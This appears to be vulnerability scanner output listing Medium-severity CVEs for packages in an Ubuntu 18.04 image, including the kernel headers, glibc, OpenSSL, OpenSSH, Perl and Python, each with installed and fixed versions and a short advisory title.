Medium CVE-2021-37576 linux-libc-dev 4.15.0-24.26 4.15.0-159.167 kernel: powerpc: KVM guest OS users can cause host OS memory corruption linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3759 linux-libc-dev 4.15.0-24.26 4.15.0-162.170 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3760 linux-libc-dev 4.15.0-24.26 4.15.0-166.174 kernel: nfc: Use-After-Free vulnerability of ndev->rf_conn_info object linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3764 linux-libc-dev 4.15.0-24.26 4.15.0-163.171 kernel: DoS in ccp_run_aes_gcm_cmd() function linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38160 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: data corruption or loss can be triggered by an untrusted device that supplies a buf->len value exceeding the buffer size in drivers/char/virtio_console.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38198 linux-libc-dev 4.15.0-24.26 4.15.0-161.169 kernel: arch/x86/kvm/mmu/paging_tmpl.h incorrectly computes the access permissions of a shadow page linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38199 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: incorrect connection-setup ordering allows operators of remote NFSv4 servers to cause a DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2021-38208 linux-libc-dev 4.15.0-24.264.15.0-154.161kernel: NULL pointer dereference in net/nfc/llcp_sock.c by making a getsockname call after a certain type of failure of a bind call linux-libc-dev:4.15.0-24.26
Medium CVE-2021-3894 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: sctp: local DoS: unprivileged user can cause BUG() linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39633 linux-libc-dev 4.15.0-24.264.15.0-162.170In gre_handle_offloads of ip_gre.c, there is a possible page fault due ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39634 linux-libc-dev 4.15.0-24.264.15.0-126.129In fs/eventpoll.c, there is a possible use after free. This could lead ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39648 linux-libc-dev 4.15.0-24.264.15.0-137.141kernel: possible disclosure of memory due to a race condition in gadget_dev_desc_UDC_show() of configfs.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39656 linux-libc-dev 4.15.0-24.264.15.0-144.148In __configfs_open_file of file.c, there is a possible use-after-free ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39657 linux-libc-dev 4.15.0-24.264.15.0-141.145In ufshcd_eh_device_reset_handler of ufshcd.c, there is a possible out ... linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39685 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: USB gadget buffer overflow linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39698 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: use-after-free in the file polling implementation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-39711 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: out-of-bounds read due to Incorrect size value in bpf_prog_test_run_skb() of test_run.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4037 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: security regression for CVE-2018-13405 linux-libc-dev:4.15.0-24.26
Medium CVE-2021-40490 linux-libc-dev 4.15.0-24.264.15.0-161.169kernel: race condition was discovered in ext4_write_inline_data_end in fs/ext4/inline.c in the ext4 subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4083 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: fget: check that the fd still exists after getting a ref to it linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4149 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: Improper lock operation in btrfs linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4155 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: xfs: raw block device data leak in XFS_IOC_ALLOCSP IOCTL linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4157 linux-libc-dev 4.15.0-24.264.15.0-151.157kernel: Buffer overwrite in decode_nfs_fh function linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4197 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: cgroup: Use open-time creds and namespace for migration perm checks linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4202 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: Race condition in nci_request() leads to use after free while the device is getting removed linux-libc-dev:4.15.0-24.26
Medium CVE-2021-4203 linux-libc-dev 4.15.0-24.264.15.0-163.171kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses linux-libc-dev:4.15.0-24.26
Medium CVE-2021-42252 linux-libc-dev 4.15.0-24.264.15.0-162.170kernel: memory overwrite in the kernel with potential privileges execution linux-libc-dev:4.15.0-24.26
Medium CVE-2021-42739 linux-libc-dev 4.15.0-24.26 4.15.0-167.175 kernel: Heap buffer overflow in firedtv driver linux-libc-dev:4.15.0-24.26
Medium CVE-2021-43975 linux-libc-dev 4.15.0-24.26 4.15.0-176.185 kernel: out-of-bounds write in hw_atl_utils_fw_rpc_wait() in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-44733 linux-libc-dev 4.15.0-24.26 4.15.0-173.182 kernel: use-after-free in the TEE subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45095 linux-libc-dev 4.15.0-24.26 4.15.0-173.182 kernel: refcount leak in pep_sock_accept() in net/phonet/pep.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45469 linux-libc-dev 4.15.0-24.26 4.15.0-169.177 kernel: out-of-bounds memory access in __f2fs_setxattr() in fs/f2fs/xattr.c when an inode has an invalid last xattr entry linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45485 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: information leak in the IPv6 implementation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45486 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: information leak in the IPv4 implementation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45868 linux-libc-dev 4.15.0-24.26 4.15.0-167.175 kernel: fs/quota/quota_tree.c does not validate the block number in the quota tree linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0322 linux-libc-dev 4.15.0-24.26 4.15.0-166.174 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0330 linux-libc-dev 4.15.0-24.26 4.15.0-169.177 kernel: possible privileges escalation due to missing TLB flush linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0435 linux-libc-dev 4.15.0-24.26 4.15.0-173.182 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0487 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 kernel: Use after free in moxart_remove linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0644 linux-libc-dev 4.15.0-24.26 4.15.0-166.174 kernel: Assertion failure can happen if users trigger kernel_read_file_from_fd() linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0850 linux-libc-dev 4.15.0-24.26 4.15.0-156.163 kernel: information leak in copy_page_to_iter() in iov_iter.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1011 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1016 linux-libc-dev 4.15.0-24.26 4.15.0-184.194 kernel: uninitialized registers on stack in nft_do_chain can cause kernel pointer leakage to UM linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1198 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: use-after-free in drivers/net/hamradio/6pack.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1199 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: Null pointer dereference and use after free in ax25_release() linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1204 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: Use after free in net/ax25/af_ax25.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1205 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: Null pointer dereference and use after free in net/ax25/ax25_timer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1353 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 Kernel: A kernel-info-leak issue in pfkey_register linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1419 linux-libc-dev 4.15.0-24.26 4.15.0-184.194 kernel: a concurrency use-after-free in vgem_gem_dumb_create linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1516 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: null-ptr-deref caused by x25_disconnect linux-libc-dev:4.15.0-24.26
Medium CVE-2022-20009 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 In various functions of the USB gadget subsystem, there is a possible out of bounds write due to a missing bounds check linux-libc-dev:4.15.0-24.26
Medium CVE-2022-21123 linux-libc-dev 4.15.0-24.26 4.15.0-187.198 hw: cpu: Incomplete cleanup of multi-core shared buffers (aka SBDR) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-21125 linux-libc-dev 4.15.0-24.26 4.15.0-187.198 hw: cpu: Incomplete cleanup of microarchitectural fill buffers (aka SBDS) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-21166 linux-libc-dev 4.15.0-24.26 4.15.0-187.198 hw: cpu: Incomplete cleanup in specific special register write operations (aka DRPW) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-22942 linux-libc-dev 4.15.0-24.26 4.15.0-169.177 kernel: failing usercopy allows for use-after-free exploitation linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23036 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23037 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23038 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23039 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23040 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23042 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-24448 linux-libc-dev 4.15.0-24.26 4.15.0-176.185 kernel: nfs_atomic_open() returns uninitialized data instead of ENOTDIR linux-libc-dev:4.15.0-24.26
Medium CVE-2022-24958 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 kernel: use-after-free in dev->buf release in drivers/usb/gadget/legacy/inode.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-25258 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 kernel: security issues in the OS descriptor handling section of composite_setup function (composite.c) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-25375 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 kernel: information disclosure in drivers/usb/gadget/function/rndis.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-26490 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 kernel: potential buffer overflows in EVT_TRANSACTION in st21nfca linux-libc-dev:4.15.0-24.26
Medium CVE-2022-26966 linux-libc-dev 4.15.0-24.26 4.15.0-177.186 kernel: heap memory leak in drivers/net/usb/sr9700.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-27666 linux-libc-dev 4.15.0-24.26 4.15.0-175.184 kernel: buffer overflow in IPsec ESP transformation code linux-libc-dev:4.15.0-24.26
Medium CVE-2022-28388 linux-libc-dev 4.15.0-24.26 4.15.0-188.199 kernel: a double free in usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-28389 linux-libc-dev 4.15.0-24.26 4.15.0-189.200 kernel: a double free in mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-28390 linux-libc-dev 4.15.0-24.26 4.15.0-184.194 kernel: a double free in ems_usb_start_xmit in drivers/net/can/usb/ems_usb.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-30594 linux-libc-dev 4.15.0-24.26 4.15.0-180.189 kernel: mishandled seccomp permissions linux-libc-dev:4.15.0-24.26
Medium CVE-2022-32250 linux-libc-dev 4.15.0-24.26 4.15.0-184.194 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root linux-libc-dev:4.15.0-24.26
Medium CVE-2018-11236 multiarch-support 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow multiarch-support:2.27-3ubuntu1
Medium CVE-2018-11237 multiarch-support 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper multiarch-support:2.27-3ubuntu1
Medium CVE-2018-19591 multiarch-support 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c multiarch-support:2.27-3ubuntu1
Medium CVE-2020-1751 multiarch-support 2.27-3ubuntu1 2.27-3ubuntu1.2 glibc: array overflow in backtrace functions for powerpc multiarch-support:2.27-3ubuntu1
Medium CVE-2021-3999 multiarch-support 2.27-3ubuntu1 2.27-3ubuntu1.5 glibc: Off-by-one buffer overflow/underflow in getcwd() multiarch-support:2.27-3ubuntu1
Medium CVE-2021-20305 nettle-dev 3.4-1 3.4-1ubuntu0.1 nettle: Out of bounds memory access in signature verification nettle-dev:3.4-1
Medium CVE-2021-3580 nettle-dev 3.4-1 3.4.1-0ubuntu0.18.04.1 nettle: Remote crash in RSA decryption via manipulated ciphertext nettle-dev:3.4-1
Medium CVE-2018-20685 openssh-client 1:7.6p1-4 1:7.6p1-4ubuntu0.2 openssh: scp client improper directory name validation openssh-client:1:7.6p1-4
Medium CVE-2019-6109 openssh-client 1:7.6p1-4 1:7.6p1-4ubuntu0.2 openssh: Missing character encoding in progress display allows for spoofing of scp client output openssh-client:1:7.6p1-4
Medium CVE-2021-23841 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.8 openssl: NULL pointer dereference in X509_issuer_and_serial_hash() openssl:1.1.0g-2ubuntu4.1
Medium CVE-2021-3712 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.13 openssl: Read buffer overruns processing ASN.1 strings openssl:1.1.0g-2ubuntu4.1
Medium CVE-2022-1292 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.17 openssl: c_rehash script allows command injection openssl:1.1.0g-2ubuntu4.1
Medium CVE-2022-2068 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.19 openssl: the c_rehash script allows command injection openssl:1.1.0g-2ubuntu4.1
Medium CVE-2022-2097 openssl 1.1.0g-2ubuntu4.1 1.1.1-1ubuntu2.1~18.04.20 openssl: AES OCB fails to encrypt some bytes openssl:1.1.0g-2ubuntu4.1
Medium CVE-2018-20969 patch 2.7.6-2ubuntu1 2.7.6-2ubuntu1.1 patch: do_ed_script in pch.c does not block strings beginning with a ! character patch:2.7.6-2ubuntu1
Medium CVE-2019-13636 patch 2.7.6-2ubuntu1 2.7.6-2ubuntu1.1 patch: the following of symlinks in inp.c and util.c is mishandled in cases other than input files patch:2.7.6-2ubuntu1
Medium CVE-2019-13638 patch 2.7.6-2ubuntu1 2.7.6-2ubuntu1.1 patch: OS shell command injection when processing crafted patch files patch:2.7.6-2ubuntu1
Medium CVE-2018-18311 perl 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Integer overflow leading to buffer overflow in Perl_my_setenv() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 perl 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_handle_regex_sets() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 perl 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer read overflow in S_grok_bslash_N() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 perl 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_regatom() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18311 perl-base 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Integer overflow leading to buffer overflow in Perl_my_setenv() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 perl-base 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_handle_regex_sets() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 perl-base 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer read overflow in S_grok_bslash_N() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 perl-base 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_regatom() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18311 perl-modules-5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Integer overflow leading to buffer overflow in Perl_my_setenv() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 perl-modules-5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_handle_regex_sets() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 perl-modules-5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer read overflow in S_grok_bslash_N() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 perl-modules-5.26 5.26.1-6ubuntu0.1 5.26.1-6ubuntu0.3 perl: Heap-based buffer overflow in S_regatom() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-1000802 python2.7 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Command injection in the shutil module python2.7:2.7.15~rc1-1
Medium CVE-2018-14647 python2.7 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Missing salt initialization in _elementtree.c module python2.7:2.7.15~rc1-1
Medium CVE-2018-20852 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Cookie domain check returns incorrect results python2.7:2.7.15~rc1-1
Medium CVE-2019-10160 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python2.7:2.7.15~rc1-1
Medium CVE-2019-16056 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.2 python: email.utils.parseaddr wrongly parses email addresses python2.7:2.7.15~rc1-1
Medium CVE-2019-18348 python2.7 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() python2.7:2.7.15~rc1-1
Medium CVE-2019-20907 python2.7 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive python2.7:2.7.15~rc1-1
Medium CVE-2019-9636 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Information Disclosure due to urlsplit improper NFKC normalization python2.7:2.7.15~rc1-1
Medium CVE-2019-9740 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the query part of the url passed to urlopen() python2.7:2.7.15~rc1-1
Medium CVE-2019-9947 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the path part of the url passed to urlopen() python2.7:2.7.15~rc1-1
Medium CVE-2019-9948 python2.7 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python2.7:2.7.15~rc1-1
Medium CVE-2020-26116 python2.7 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.2 python: CRLF injection via HTTP request method in httplib/http.client python2.7:2.7.15~rc1-1
Medium CVE-2021-3177 python2.7 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.6 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python2.7:2.7.15~rc1-1
Medium CVE-2021-4189 python2.7 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response python2.7:2.7.15~rc1-1
Medium CVE-2022-0391 python2.7 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python2.7:2.7.15~rc1-1
Medium CVE-2018-1000802 python2.7-minimal 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Command injection in the shutil module python2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-14647 python2.7-minimal 2.7.15~rc1-1 2.7.15~rc1-1ubuntu0.1 python: Missing salt initialization in _elementtree.c module python2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-20852 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Cookie domain check returns incorrect results python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-10160 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-16056 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.2 python: email.utils.parseaddr wrongly parses email addresses python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-18348 python2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-20907 python2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9636 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Information Disclosure due to urlsplit improper NFKC normalization python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9740 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the query part of the url passed to urlopen() python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9947 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: CRLF injection via the path part of the url passed to urlopen() python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9948 python2.7-minimal 2.7.15~rc1-1 2.7.15-4ubuntu4~18.04.1 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python2.7-minimal:2.7.15~rc1-1
Medium CVE-2020-26116 python2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.2 python: CRLF injection via HTTP request method in httplib/http.client python2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-3177 python2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.6 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-4189 python2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response python2.7-minimal:2.7.15~rc1-1
Medium CVE-2022-0391 python2.7-minimal 2.7.15~rc1-1 2.7.17-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-14647 python3.6 3.6.5-3 3.6.7-1~18.04 python: Missing salt initialization in _elementtree.c module python3.6:3.6.5-3
Medium CVE-2018-20852 python3.6 3.6.5-3 3.6.8-1~18.04.2 python: Cookie domain check returns incorrect results python3.6:3.6.5-3
Medium CVE-2019-10160 python3.6 3.6.5-3 3.6.8-1~18.04.2 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python3.6:3.6.5-3
Medium CVE-2019-16056 python3.6 3.6.5-3 3.6.8-1~18.04.3 python: email.utils.parseaddr wrongly parses email addresses python3.6:3.6.5-3
Medium CVE-2019-18348 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() python3.6:3.6.5-3
Medium CVE-2019-20907 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive python3.6:3.6.5-3
Medium CVE-2019-9636 python3.6 3.6.5-3 3.6.8-1~18.04.2 python: Information Disclosure due to urlsplit improper NFKC normalization python3.6:3.6.5-3
Medium CVE-2019-9740 python3.6 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the query part of the url passed to urlopen() python3.6:3.6.5-3
Medium CVE-2019-9947 python3.6 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the path part of the url passed to urlopen() python3.6:3.6.5-3
Medium CVE-2019-9948 python3.6 3.6.5-3 3.6.8-1~18.04.2 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python3.6:3.6.5-3
Medium CVE-2020-26116 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.3 python: CRLF injection via HTTP request method in httplib/http.client python3.6:3.6.5-3
Medium CVE-2021-3177 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.4 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python3.6:3.6.5-3
Medium CVE-2021-3733 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: Regular expression DoS in AbstractBasicAuthHandler python3.6:3.6.5-3
Medium CVE-2021-3737 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: HTTP client possible infinite loop on a 100 Continue response python3.6:3.6.5-3
Medium CVE-2021-4189 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response python3.6:3.6.5-3
Medium CVE-2022-0391 python3.6 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python3.6:3.6.5-3
Medium CVE-2018-14647 python3.6-minimal 3.6.5-3 3.6.7-1~18.04 python: Missing salt initialization in _elementtree.c module python3.6-minimal:3.6.5-3
Medium CVE-2018-20852 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: Cookie domain check returns incorrect results python3.6-minimal:3.6.5-3
Medium CVE-2019-10160 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python3.6-minimal:3.6.5-3
Medium CVE-2019-16056 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.3 python: email.utils.parseaddr wrongly parses email addresses python3.6-minimal:3.6.5-3
Medium CVE-2019-18348 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1 python: CRLF injection via the host part of the url passed to urlopen() python3.6-minimal:3.6.5-3
Medium CVE-2019-20907 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.1 python: infinite loop in the tarfile module via crafted TAR archive python3.6-minimal:3.6.5-3
Medium CVE-2019-9636 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: Information Disclosure due to urlsplit improper NFKC normalization python3.6-minimal:3.6.5-3
Medium CVE-2019-9740 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the query part of the url passed to urlopen() python3.6-minimal:3.6.5-3
Medium CVE-2019-9947 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: CRLF injection via the path part of the url passed to urlopen() python3.6-minimal:3.6.5-3
Medium CVE-2019-9948 python3.6-minimal 3.6.5-3 3.6.8-1~18.04.2 python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python3.6-minimal:3.6.5-3
Medium CVE-2020-26116 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.3 python: CRLF injection via HTTP request method in httplib/http.client python3.6-minimal:3.6.5-3
Medium CVE-2021-3177 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.4 python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python3.6-minimal:3.6.5-3
Medium CVE-2021-3733 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: Regular expression DoS in AbstractBasicAuthHandler python3.6-minimal:3.6.5-3
Medium CVE-2021-3737 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.6 python: urllib: HTTP client possible infinite loop on a 100 Continue response python3.6-minimal:3.6.5-3
Medium CVE-2021-4189 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: ftplib should not use the host from the PASV response python3.6-minimal:3.6.5-3
Medium CVE-2022-0391 python3.6-minimal 3.6.5-3 3.6.9-1~18.04ubuntu1.7 python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python3.6-minimal:3.6.5-3
Medium CVE-2022-1271 xz-utils 5.2.2-1.3 5.2.2-1.3ubuntu0.1 gzip: arbitrary-file-write vulnerability xz-utils:5.2.2-1.3
